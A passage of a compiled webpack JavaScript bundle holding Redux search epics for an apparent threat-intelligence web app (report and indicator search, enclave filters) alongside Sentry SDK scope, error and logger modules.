/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__actions__ = __webpack_require__(1414);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__getters__ = __webpack_require__(557);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_modules_enclave__ = __webpack_require__(296);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_profile__ = __webpack_require__(140);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_app_getters__ = __webpack_require__(182);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16__app_action_types__ = __webpack_require__(134);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17__components_browse_Search2_0_search_constants__ = __webpack_require__(1630);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

/*  weak */








var debug = __WEBPACK_IMPORTED_MODULE_7_debug___default()('app:modules:search:epics'); // eslint-disable-line no-unused-vars














var handleSearchErrorResponse = function handleSearchErrorResponse(response) {
  var DEFAULT_ERROR_MESSAGE = 'Could not perform search, please contact support if the problem persists.';

  if (!response) {
    return DEFAULT_ERROR_MESSAGE;
  }

  return response.exception || response.message || DEFAULT_ERROR_MESSAGE;
};

/* Initiate search action: routes search query to url */
var routeSearchEpic = function routeSearchEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["t" /* TRIGGER_SEARCH */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).do(function (search) {
    __WEBPACK_IMPORTED_MODULE_2_react_router__["browserHistory"].push({
      pathname: '/browse/search',
      search: '?q=' + encodeURIComponent(search)
    });
  }).ignoreElements();
};

/* Main epic to handle running a search */
var searchEpic = function searchEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["f" /* EXECUTE_SEARCH */]).mergeMap(function (action) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      var searchTerm = action.payload;

      var state = store.getState();
      var userLoggedIn = Object(__WEBPACK_IMPORTED_MODULE_15_modules_app_getters__["isLoggedIn"])(state);
      if (Object(__WEBPACK_IMPORTED_MODULE_15_modules_app_getters__["loading"])(state) || !userLoggedIn) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(action).delay(1000);
      }

      var searchPayload = {
        fields: ['query', 'pageNumber'],
        payload: Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["Map"])({
          pageNumber: 0,
          query: searchTerm
        }),
        dispatchSearchAfterUpdate: true // We update the query term and then execute search -- no race!
      };

      return [__WEBPACK_IMPORTED_MODULE_11__actions__["setViewPanel"]('ENTITIES'), _extends({ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["v" /* UPDATE_REPORT_PAGE_FILTERS */] }, searchPayload), _extends({ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["u" /* UPDATE_ENTITY_PAGE_FILTERS */] }, searchPayload)];
    }).catch(function (err) {
      // TODO_LOG // TODO_LOG captureError(err);
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
    });
  });
};

// When you clear the form on the top search bar (i.e. click on the X), this will trigger a search with the new query payload
var clearSearchFormEpic = function clearSearchFormEpic(action$, store) {
  return action$.ofType('@@redux-form/RESET').filter(function (action) {
    return action.meta && action.meta.form === 'search';
  }).map(function () {
    return __WEBPACK_IMPORTED_MODULE_11__actions__["executeSearch"]('');
  });
};

// Search 2.0
var formatSearchRequest = function formatSearchRequest(payload) {
  var formattedFilters = payload.get('filters').reduce(function (finalFilterArray, filterMap, filterName) {
    return finalFilterArray.concat(_extends({
      field: filterName
    }, filterMap.toObject()));
  }, []);

  var justTagNames = payload.get('tagFilters').update('included', function (tagObjects) {
    return tagObjects.map(function (t) {
      return t.get('name');
    });
  }).update('excluded', function (tagObjects) {
    return tagObjects.map(function (t) {
      return t.get('name');
    });
  });

  return payload.set('filters', formattedFilters).set('tagFilters', justTagNames).update('sort', function (sort) {
    return sort.has('sort') ? sort.get('sort') : sort;
  });
};

var formatSearchResponse = function formatSearchResponse(payload, searchType) {
  if (!payload) return Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["Map"])();

  var formattedPayload = Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["Map"])(payload).set('searchType', searchType).update('items', function () {
    var items = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["List"])();

    return items.map(function (item) {
      return Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["Map"])(item);
    });
  });

  return formattedPayload;
};

var searchReportsRequest = function searchReportsRequest(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["e" /* EXECUTE_REPORTS_SEARCH */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).map(formatSearchRequest).map(function (payload) {
    return payload.set('type', 'INCIDENT_REPORT');
  }).switchMap(function (searchDto) {
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_10__constants__["searchV3ReportEndpoint"], searchDto).mergeMap(function (_ref2) {
      var response = _ref2.response;

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types__["p" /* SEARCH_REPORTS_SUCCESS */],
        payload: formatSearchResponse(response, 'reports')
      });
    }).catch(function (err) {
      var humanErrorMessage = handleSearchErrorResponse(err.response);
      // TODO_LOG // TODO_LOG captureError(err);
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types__["o" /* SEARCH_REPORTS_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: humanErrorMessage }
        }
      });
    });
  });
};

var searchEntitiesRequest = function searchEntitiesRequest(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["d" /* EXECUTE_ENTITIES_SEARCH */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).map(formatSearchRequest).map(function (payload) {
    return payload.set('type', 'INDICATOR');
  }).switchMap(function (searchDto) {
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_10__constants__["searchV3EntityEndpoint"], searchDto).mergeMap(function (_ref4) {
      var response = _ref4.response;

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types__["n" /* SEARCH_ENTITIES_SUCCESS */],
        payload: formatSearchResponse(response, 'entities')
      });
    }).catch(function (err) {
      var humanErrorMessage = handleSearchErrorResponse(err.response);
      // TODO_LOG captureError(err);
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types__["m" /* SEARCH_ENTITIES_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: humanErrorMessage }
        }
      });
    });
  });
};

/*
  This epic may be a bit overloaded, but it handles updates and clears for reports and iocs
 We are looking for filter payload updates with a flag to execute a search immediately after the update,
 think any auto-updating filter clicks (likes sorter)
*/
var updateSearchPayloadEpic = function updateSearchPayloadEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["v" /* UPDATE_REPORT_PAGE_FILTERS */], __WEBPACK_IMPORTED_MODULE_8__action_types__["u" /* UPDATE_ENTITY_PAGE_FILTERS */]).filter(function (action) {
    return !!action.dispatchSearchAfterUpdate;
  }).mergeMap(function (action) {
    var state = store.getState();
    var searchToExecute = action.type === __WEBPACK_IMPORTED_MODULE_8__action_types__["v" /* UPDATE_REPORT_PAGE_FILTERS */] ? __WEBPACK_IMPORTED_MODULE_8__action_types__["e" /* EXECUTE_REPORTS_SEARCH */] : __WEBPACK_IMPORTED_MODULE_8__action_types__["d" /* EXECUTE_ENTITIES_SEARCH */];
    var payload = action.type === __WEBPACK_IMPORTED_MODULE_8__action_types__["v" /* UPDATE_REPORT_PAGE_FILTERS */] ? __WEBPACK_IMPORTED_MODULE_12__getters__["reportPageQuery"](state) : __WEBPACK_IMPORTED_MODULE_12__getters__["entityPageQuery"](state);
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      return [{ type: searchToExecute, payload: payload }];
    });
  }).catch(function (err) {
    // TODO_LOG captureError(err);
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
  });
};

/*
  Set the filters to their defaults, if dispatchSearchAfterUpdate is set to true then we will
  search with default params -- giving us what /browse used to be, a get-all search.
  Filters go back to their defaults regardless.
 */
var clearSearchPayloadEpic = function clearSearchPayloadEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["b" /* CLEAR_REPORT_SEARCH_FILTERS */], __WEBPACK_IMPORTED_MODULE_8__action_types__["a" /* CLEAR_ENTITY_SEARCH_FILTERS */]).mergeMap(function (action) {
    var state = store.getState();
    /* NOTE: Must have Profile and Enclaves loaded first */
    var profileLoading = __WEBPACK_IMPORTED_MODULE_14_modules_profile__["getters"].loading(state);
    var enclaveLoading = __WEBPACK_IMPORTED_MODULE_13_modules_enclave__["getters"].loading(state);
    var userLoggedIn = Object(__WEBPACK_IMPORTED_MODULE_15_modules_app_getters__["isLoggedIn"])(state);

    if (!userLoggedIn) return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();

    if (profileLoading || enclaveLoading) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(action).delay(500);
    }

    // Grab our default enclaves for the user and set them
    var defaultEnclaves = __WEBPACK_IMPORTED_MODULE_14_modules_profile__["getters"].privateEnclavesIdSet(state);
    var payload = Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["Map"])({ 'enclaveFilters': defaultEnclaves });

    if (action.onGoingSearch) {
      payload.set('query', action.onGoingSearch);
    }

    var updateType = action.type === __WEBPACK_IMPORTED_MODULE_8__action_types__["b" /* CLEAR_REPORT_SEARCH_FILTERS */] ? __WEBPACK_IMPORTED_MODULE_8__action_types__["v" /* UPDATE_REPORT_PAGE_FILTERS */] : __WEBPACK_IMPORTED_MODULE_8__action_types__["u" /* UPDATE_ENTITY_PAGE_FILTERS */];
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      return [{ type: updateType,
        payload: payload,
        fields: ['enclaveFilters'],
        dispatchSearchAfterUpdate: action.dispatchSearchAfterUpdate
      }, { type: __WEBPACK_IMPORTED_MODULE_8__action_types__["w" /* UPDATE_SEARCH_PAGE_FILTERS */],
        payload: payload,
        fields: ['enclaveFilters'],
        dispatchSearchAfterUpdate: action.dispatchSearchAfterUpdate
      }];
    });
  }).catch(function (err) {
    // TODO_LOG captureError(err);
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
  });
};

// Search Page epics largely translate to actions for reports and entities, we just need to do some filtering and data modification for them
var splitSearchQueryUpdatesEpic = function splitSearchQueryUpdatesEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types__["w" /* UPDATE_SEARCH_PAGE_FILTERS */], __WEBPACK_IMPORTED_MODULE_8__action_types__["c" /* CLEAR_SEARCH_PAGE_FILTERS */]).mergeMap(function (action) {
    var actions = void 0;

    if (action.type === __WEBPACK_IMPORTED_MODULE_8__action_types__["c" /* CLEAR_SEARCH_PAGE_FILTERS */]) {
      actions = [_extends({}, action, { type: __WEBPACK_IMPORTED_MODULE_8__action_types__["b" /* CLEAR_REPORT_SEARCH_FILTERS */] }), _extends({}, action, { type: __WEBPACK_IMPORTED_MODULE_8__action_types__["a" /* CLEAR_ENTITY_SEARCH_FILTERS */] }), __WEBPACK_IMPORTED_MODULE_11__actions__["resetSearch"]()];
    } else {
      actions = [_extends({}, action, { type: __WEBPACK_IMPORTED_MODULE_8__action_types__["v" /* UPDATE_REPORT_PAGE_FILTERS */] }), _extends({}, action, { type: __WEBPACK_IMPORTED_MODULE_8__action_types__["u" /* UPDATE_ENTITY_PAGE_FILTERS */] })];
    }

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      return actions;
    });
  }).catch(function (err) {
    // TODO_LOG captureError(err);
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
  });
};

var initializeSearchResultsEpic = function initializeSearchResultsEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__app_action_types__["LOGIN_SUCCESS"]).mergeMap(function (action) {
    var state = store.getState();

    /* NOTE: Must have Profile and Enclaves loaded first */
    var profileLoading = __WEBPACK_IMPORTED_MODULE_14_modules_profile__["getters"].loading(state);
    var enclaveLoading = __WEBPACK_IMPORTED_MODULE_13_modules_enclave__["getters"].loading(state);
    var onGoingSearch = __WEBPACK_IMPORTED_MODULE_12__getters__["searchTerm"](state);

    if (profileLoading || enclaveLoading) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(action).delay(500);
    }

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      return onGoingSearch ? [{ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["f" /* EXECUTE_SEARCH */], payload: onGoingSearch }] : [{ type: __WEBPACK_IMPORTED_MODULE_8__action_types__["c" /* CLEAR_SEARCH_PAGE_FILTERS */], dispatchSearchAfterUpdate: true }];
    });
  }).catch(function (err) {
    // TODO_LOG captureError(err);
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_3_redux_observable__["combineEpics"])(routeSearchEpic, searchEpic, clearSearchFormEpic, searchReportsRequest, updateSearchPayloadEpic, searchEntitiesRequest, clearSearchPayloadEpic, splitSearchQueryUpdatesEpic, initializeSearchResultsEpic));

/***/ }),
/* 1417 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchSummary", function() { return fetchSummary; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toggleShowEntireSummary", function() { return toggleShowEntireSummary; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchClosedSourceEnclaveSourceMap", function() { return fetchClosedSourceEnclaveSourceMap; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(373);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types__ = __webpack_require__(373);




/* Fetches a summary for a report */
var fetchSummary = function fetchSummary(reportId) {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["h" /* FETCH_SUMMARY */], payload: reportId };
};

var toggleShowEntireSummary = function toggleShowEntireSummary(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["k" /* SHOW_ENTIRE_SUMMARY_TOGGLE */],
    payload: payload
  };
};

var fetchClosedSourceEnclaveSourceMap = function fetchClosedSourceEnclaveSourceMap(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_2__action_types__["c" /* FETCH_CS_ENCLAVE_SOURCE_MAP */],
    payload: payload
  };
};

/***/ }),
/* 1418 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SCORES_ENDPOINT; });
var SCORES_ENDPOINT = '/services/entity-reports/scores';

/***/ }),
/* 1419 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export normalizeScoresEntry */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


/* Normalizes scores records */
var normalizeScoresEntry = function normalizeScoresEntry(entry) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])(entry)();
};

/***/ }),
/* 1420 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Scope; });
/* harmony export (immutable) */ __webpack_exports__["b"] = addGlobalEventProcessor;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__span__ = __webpack_require__(1424);



/**
 * Holds additional event information. {@link Scope.applyToEvent} will be
 * called by the client before an event will be sent.
 */
var Scope = /** @class */ (function () {
    function Scope() {
        /** Flag if notifiying is happening. */
        this._notifyingListeners = false;
        /** Callback for client to receive scope changes. */
        this._scopeListeners = [];
        /** Callback list that will be called after {@link applyToEvent}. */
        this._eventProcessors = [];
        /** Array of breadcrumbs. */
        this._breadcrumbs = [];
        /** User */
        this._user = {};
        /** Tags */
        this._tags = {};
        /** Extra */
        this._extra = {};
        /** Contexts */
        this._context = {};
    }
    /**
     * Add internal on change listener. Used for sub SDKs that need to store the scope.
     * @hidden
     */
    Scope.prototype.addScopeListener = function (callback) {
        this._scopeListeners.push(callback);
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.addEventProcessor = function (callback) {
        this._eventProcessors.push(callback);
        return this;
    };
    /**
     * This will be called on every set call.
     */
    Scope.prototype._notifyScopeListeners = function () {
        var _this = this;
        if (!this._notifyingListeners) {
            this._notifyingListeners = true;
            setTimeout(function () {
                _this._scopeListeners.forEach(function (callback) {
                    callback(_this);
                });
                _this._notifyingListeners = false;
            });
        }
    };
    /**
     * This will be called after {@link applyToEvent} is finished.
     */
    Scope.prototype._notifyEventProcessors = function (processors, event, hint, index) {
        var _this = this;
        if (index === void 0) { index = 0; }
        return new __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["c" /* SyncPromise */](function (resolve, reject) {
            var processor = processors[index];
            // tslint:disable-next-line:strict-type-predicates
            if (event === null || typeof processor !== 'function') {
                resolve(event);
            }
            else {
                var result = processor(__WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, event), hint);
                if (Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["r" /* isThenable */])(result)) {
                    result
                        .then(function (final) { return _this._notifyEventProcessors(processors, final, hint, index + 1).then(resolve); })
                        .catch(reject);
                }
                else {
                    _this._notifyEventProcessors(processors, result, hint, index + 1)
                        .then(resolve)
                        .catch(reject);
                }
            }
        });
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setUser = function (user) {
        this._user = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(user);
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setTags = function (tags) {
        this._tags = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, this._tags, Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(tags));
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setTag = function (key, value) {
        var _a;
        this._tags = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, this._tags, (_a = {}, _a[key] = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(value), _a));
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setExtras = function (extra) {
        this._extra = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, this._extra, Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(extra));
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setExtra = function (key, extra) {
        var _a;
        this._extra = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, this._extra, (_a = {}, _a[key] = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(extra), _a));
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setFingerprint = function (fingerprint) {
        this._fingerprint = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(fingerprint);
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setLevel = function (level) {
        this._level = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(level);
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setTransaction = function (transaction) {
        this._transaction = transaction;
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setContext = function (name, context) {
        this._context[name] = context ? Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(context) : undefined;
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.setSpan = function (span) {
        this._span = span;
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.startSpan = function (parentSpan) {
        var span = new __WEBPACK_IMPORTED_MODULE_2__span__["a" /* Span */]();
        span.setParent(parentSpan);
        this.setSpan(span);
        return span;
    };
    /**
     * Internal getter for Span, used in Hub.
     * @hidden
     */
    Scope.prototype.getSpan = function () {
        return this._span;
    };
    /**
     * Inherit values from the parent scope.
     * @param scope to clone.
     */
    Scope.clone = function (scope) {
        var newScope = new Scope();
        Object.assign(newScope, scope, {
            _scopeListeners: [],
        });
        if (scope) {
            newScope._breadcrumbs = __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](scope._breadcrumbs);
            newScope._tags = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, scope._tags);
            newScope._extra = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, scope._extra);
            newScope._context = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, scope._context);
            newScope._user = scope._user;
            newScope._level = scope._level;
            newScope._span = scope._span;
            newScope._transaction = scope._transaction;
            newScope._fingerprint = scope._fingerprint;
            newScope._eventProcessors = __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](scope._eventProcessors);
        }
        return newScope;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.clear = function () {
        this._breadcrumbs = [];
        this._tags = {};
        this._extra = {};
        this._user = {};
        this._context = {};
        this._level = undefined;
        this._transaction = undefined;
        this._fingerprint = undefined;
        this._span = undefined;
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.addBreadcrumb = function (breadcrumb, maxBreadcrumbs) {
        var timestamp = new Date().getTime() / 1000;
        var mergedBreadcrumb = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({ timestamp: timestamp }, breadcrumb);
        this._breadcrumbs =
            maxBreadcrumbs !== undefined && maxBreadcrumbs >= 0
                ? __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](this._breadcrumbs, [Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(mergedBreadcrumb)]).slice(-maxBreadcrumbs)
                : __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](this._breadcrumbs, [Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["u" /* normalize */])(mergedBreadcrumb)]);
        this._notifyScopeListeners();
        return this;
    };
    /**
     * @inheritDoc
     */
    Scope.prototype.clearBreadcrumbs = function () {
        this._breadcrumbs = [];
        this._notifyScopeListeners();
        return this;
    };
    /**
     * Applies fingerprint from the scope to the event if there's one,
     * uses message if there's one instead or get rid of empty fingerprint
     */
    Scope.prototype._applyFingerprint = function (event) {
        // Make sure it's an array first and we actually have something in place
        event.fingerprint = event.fingerprint
            ? Array.isArray(event.fingerprint)
                ? event.fingerprint
                : [event.fingerprint]
            : [];
        // If we have something on the scope, then merge it with event
        if (this._fingerprint) {
            event.fingerprint = event.fingerprint.concat(this._fingerprint);
        }
        // If we have no data at all, remove empty array default
        if (event.fingerprint && !event.fingerprint.length) {
            delete event.fingerprint;
        }
    };
    /**
     * Applies the current context and fingerprint to the event.
     * Note that breadcrumbs will be added by the client.
     * Also if the event has already breadcrumbs on it, we do not merge them.
     * @param event Event
     * @param hint May contain additional informartion about the original exception.
     * @hidden
     */
    Scope.prototype.applyToEvent = function (event, hint) {
        if (this._extra && Object.keys(this._extra).length) {
            event.extra = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, this._extra, event.extra);
        }
        if (this._tags && Object.keys(this._tags).length) {
            event.tags = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, this._tags, event.tags);
        }
        if (this._user && Object.keys(this._user).length) {
            event.user = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, this._user, event.user);
        }
        if (this._context && Object.keys(this._context).length) {
            event.contexts = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, this._context, event.contexts);
        }
        if (this._level) {
            event.level = this._level;
        }
        if (this._transaction) {
            event.transaction = this._transaction;
        }
        if (this._span) {
            event.contexts = event.contexts || {};
            event.contexts.trace = this._span;
        }
        this._applyFingerprint(event);
        event.breadcrumbs = __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */]((event.breadcrumbs || []), this._breadcrumbs);
        event.breadcrumbs = event.breadcrumbs.length > 0 ? event.breadcrumbs : undefined;
        return this._notifyEventProcessors(__WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](getGlobalEventProcessors(), this._eventProcessors), event, hint);
    };
    return Scope;
}());

/**
 * Retruns the global event processors.
 */
function getGlobalEventProcessors() {
    var global = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["i" /* getGlobalObject */])();
    global.__SENTRY__ = global.__SENTRY__ || {};
    global.__SENTRY__.globalEventProcessors = global.__SENTRY__.globalEventProcessors || [];
    return global.__SENTRY__.globalEventProcessors;
}
/**
 * Add a EventProcessor to be kept globally.
 * @param callback EventProcessor to add
 */
function addGlobalEventProcessor(callback) {
    getGlobalEventProcessors().push(callback);
}
//# sourceMappingURL=scope.js.map

/***/ }),
/* 1421 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SentryError; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__polyfill__ = __webpack_require__(3217);


/** An error emitted by Sentry SDKs and related utilities. */
var SentryError = /** @class */ (function (_super) {
    __WEBPACK_IMPORTED_MODULE_0_tslib__["c" /* __extends */](SentryError, _super);
    function SentryError(message) {
        var _newTarget = this.constructor;
        var _this = _super.call(this, message) || this;
        _this.message = message;
        // tslint:disable:no-unsafe-any
        _this.name = _newTarget.prototype.constructor.name;
        Object(__WEBPACK_IMPORTED_MODULE_1__polyfill__["a" /* setPrototypeOf */])(_this, _newTarget.prototype);
        return _this;
    }
    return SentryError;
}(Error));

//# sourceMappingURL=error.js.map

/***/ }),
/* 1422 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return logger; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__misc__ = __webpack_require__(769);

// TODO: Implement different loggers for different environments
var global = Object(__WEBPACK_IMPORTED_MODULE_0__misc__["e" /* getGlobalObject */])();
/** Prefix for logging strings */
var PREFIX = 'Sentry Logger ';
/** JSDoc */
var Logger = /** @class */ (function () {
    /** JSDoc */
    function Logger() {
        this._enabled = false;
    }
    /** JSDoc */
    Logger.prototype.disable = function () {
        this._enabled = false;
    };
    /** JSDoc */
    Logger.prototype.enable = function () {
        this._enabled = true;
    };
    /** JSDoc */
    Logger.prototype.log = function () {
        var args = [];
        for (var _i = 0; _i < arguments.length; _i++) {
            args[_i] = arguments[_i];
        }
        if (!this._enabled) {
            return;
        }
        Object(__WEBPACK_IMPORTED_MODULE_0__misc__["b" /* consoleSandbox */])(function () {
            global.console.log(PREFIX + "[Log]: " + args.join(' ')); // tslint:disable-line:no-console
        });
    };
    /** JSDoc */
    Logger.prototype.warn = function () {
        var args = [];
        for (var _i = 0; _i < arguments.length; _i++) {
            args[_i] = arguments[_i];
        }
        if (!this._enabled) {
            return;
        }
        Object(__WEBPACK_IMPORTED_MODULE_0__misc__["b" /* consoleSandbox */])(function () {
            global.console.warn(PREFIX + "[Warn]: " + args.join(' ')); // tslint:disable-line:no-console
        });
    };
    /** JSDoc */
    Logger.prototype.error = function () {
        var args = [];
        for (var _i = 0; _i < arguments.length; _i++) {
            args[_i] = arguments[_i];
        }
        if (!this._enabled) {
            return;
        }
        Object(__WEBPACK_IMPORTED_MODULE_0__misc__["b" /* consoleSandbox */])(function () {
            global.console.error(PREFIX + "[Error]: " + args.join(' ')); // tslint:disable-line:no-console
        });
    };
    return Logger;
}());
// Ensure we only have a single logger instance, even if multiple versions of @sentry/utils are being used
global.__SENTRY__ = global.__SENTRY__ || {};
var logger = global.__SENTRY__.logger || (global.__SENTRY__.logger = new Logger());

//# sourceMappingURL=logger.js.map

/***/ }),
/* 1423 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
